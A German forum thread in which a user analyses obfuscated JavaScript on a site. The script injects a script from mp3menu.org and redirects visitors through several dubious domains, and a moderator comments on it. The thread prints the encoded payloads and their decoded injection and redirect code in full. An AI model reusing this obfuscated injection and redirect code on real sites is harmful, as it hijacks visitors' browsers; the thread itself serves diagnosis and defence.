Komische Umleitung durch externes Javascript

lookshe

Standardgruppe für gesperrte User
#1
Seit einigen Tagen passiert hier komisches durch folgendes Javascript:
https://examhome.net/stat.js?v=1.0.3

Code:
eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 95, 112, 97, 113, 32, 61, 32, 95, 112, 97, 113, 32, 124, 124, 32, 91, 93, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 116, 114, 97, 99, 107, 80, 97, 103, 101, 86, 105, 101, 119, 39, 93, 41, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 101, 110, 97, 98, 108, 101, 76, 105, 110, 107, 84, 114, 97, 99, 107, 105, 110, 103, 39, 93, 41, 59, 10, 32, 32, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 117, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 105, 110, 110, 111, 99, 114, 97, 102, 116, 46, 99, 108, 111, 117, 100, 47, 34, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 84, 114, 97, 99, 107, 101, 114, 85, 114, 108, 39, 44, 32, 117, 43, 39, 112, 105, 119, 105, 107, 46, 112, 104, 112, 39, 93, 41, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 83, 105, 116, 101, 73, 100, 39, 44, 32, 39, 49, 39, 93, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 44, 32, 103, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 44, 32, 115, 61, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 103, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 103, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 32, 103, 46, 100, 101, 102, 101, 114, 61, 116, 114, 117, 101, 59, 32, 103, 46, 115, 114, 99, 61, 117, 43, 39, 112, 105, 119, 105, 107, 46, 106, 115, 39, 59, 32, 115, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 103, 44, 115, 41, 59, 10, 32, 32, 125, 41, 40, 41, 59, 10)); var mrGFvAlG = String.fromCharCode(118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59); eval(mrGFvAlG);
Das ganze wird zu:

Code:
eval(
"   var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u=\"https://examhome.innocraft.cloud/\";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
");
var mrGFvAlG = "var simplelement = document.createElement('script'); 
simplelement.type = 'text/javascript'; 
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115); // "https://mp3menu.org/mp3.js"
simplelement.async = true; 
document.getElementsByTagName(\"head\")[0].appendChild(simplelement);";
eval(mrGFvAlG);
Dann gibt es eine kleine Umleitungsorgie zu irgendwelchen dubiosen Seiten.
 

Chromatin

Moderator
Mitarbeiter
#2
Der erste Teil sieht ja koscher aus. Aber der URL im 2. eval (eval(mrGFvAlG)) lässt hier die Virenscanner aktiv werden.Hast du den JS code der da geladen werden soll?eval ist aber schon fies im allgemeinen ;)
 

lookshe

Standardgruppe für gesperrte User
#3
Code:
eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));
bzw
Code:
(function() {
			if (document.cookie.indexOf(\"mp3menu=\") >= 0) {

			} else {
			  expiry = new Date();
			  expiry.setTime(expiry.getTime()+(10*60*1000*6*8));
			  document.cookie = \"mp3menu=yes; expires=\" + expiry.toGMTString();
			  var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112); // "https://mp3menu.org/red.php"
			  window.location.replace(mp3menu);
			  window.location.href = mp3menu;
			}
  })();
Auf der Seite gibt es dann im Header ein Javascript, was die nächsten komischen Weiterleitungen anstößt:
Code:
<script>window.location.replace("http://ygetygsdfertase.tk/index/?4831537102803");window.location.href = "http://ygetygsdfertase.tk/index/?4831537102803";</script>
Wobei ich allein schon den Aufruf von https://mp3menu.org/red.php über den Weg sehr fragwürdig finde und denke, dass, was auch immer das hier einbindet, sofort entfernt werden sollte.
 
Oben